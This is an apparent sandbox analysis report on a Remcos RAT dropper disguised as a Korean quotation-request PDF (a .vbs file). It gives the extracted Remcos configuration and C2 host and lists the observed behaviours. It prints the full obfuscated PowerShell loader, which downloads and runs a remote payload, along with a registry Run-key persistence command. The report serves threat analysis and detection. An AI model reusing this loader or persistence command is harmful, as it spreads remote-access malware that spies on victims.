Overview

overview

10

Static

static

1

견적요�...df.vbs

windows7-x64

10

견적요�...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 07:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs

  • Size

    15KB

  • MD5

    4080a1f28d2e8017fefb06ca6d46b608

  • SHA1

    add65be2539a98c3ce1c2bd82fb9a63a46b9c050

  • SHA256

    1fbf193c059f852718522ab608ebfeaebc3062bc2da2e4450be765f3718b210c

  • SHA512

    4647908cbaeca76c30cba24f1bb985f07b5eade617aafbec26bd74bebff5cf52d4a70b9580b2f182173ae98df5b50324a232cdfc1e4fa86141b57736e46bb381

  • SSDEEP

    384:RBOrNzhAwnWeEzMF7JDSz5nFheEduNsLXiEwnyB+7rH:2ZzhAjemMF7JDSzhFhV20XMyU7rH

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

5nd42h78s.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-J5NDOL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2332
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1740
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    f01aa02bc1994ec13357514ded8e2865

    SHA1

    f79718279ad13b7135057065bbca01984b26f783

    SHA256

    33c18a6c46e9ebb9154cade350356385145e87b9cbc871096ba706e0d53cb217

    SHA512

    31bdbdbdc594f1313c19fd4864a4303c45f00c2652542f1b6d27e596cc350425ed5429325e0e61cb4eca733366f2f786bd072bb616cfa677db76ecaa067c8747

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabAEC8.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar2128.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3KO8EP2CR5GXVBJZ2O9C.temp
    Filesize

    7KB

    MD5

    21a379821fd117c10ec3530e7365c1a7

    SHA1

    bf6e579587c9c8a66e7b9212be25a7c8785f3023

    SHA256

    ca1d1ac0fd327aeb53dd852418a74668bfed8d1af245b6643433eee5795b324a

    SHA512

    a5e180e2cac07c9c53a21ab3c9535d9f60be919375cddd46383dc8df5086a91d28ebb3b1a4d19fdeaa05c0c79a4876d380fadfb5abea2b1125358bcaf41881d8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Mundil.Snn
    Filesize

    434KB

    MD5

    7babfa1cfd73160aea1c973277be8974

    SHA1

    39f3d08cc1c21be1ca0bd6c29e9dccbc8509a275

    SHA256

    0b1bdccf05ad3242eaaf63f1eb4ecf517608251b915b6cbd6ad893426cdb0d39

    SHA512

    059f894a53baf7516569432d100ceae31182b531a35ae461a960c71333ea08383beedce1cbddecae6ad3af513c3099ad3649cb473a8e1915a9db175a61125c85

    Download Submit

  • memory/1480-61-0x0000000000A40000-0x0000000001AA2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2248-38-0x0000000006630000-0x0000000008127000-memory.dmp

    Filesize

    27.0MB

    Download

  • memory/2332-24-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-27-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-29-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2332-30-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-31-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-32-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-34-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-26-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-25-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-23-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-21-0x000000001B820000-0x000000001BB02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2332-22-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2332-20-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

    Filesize

    4KB

    Download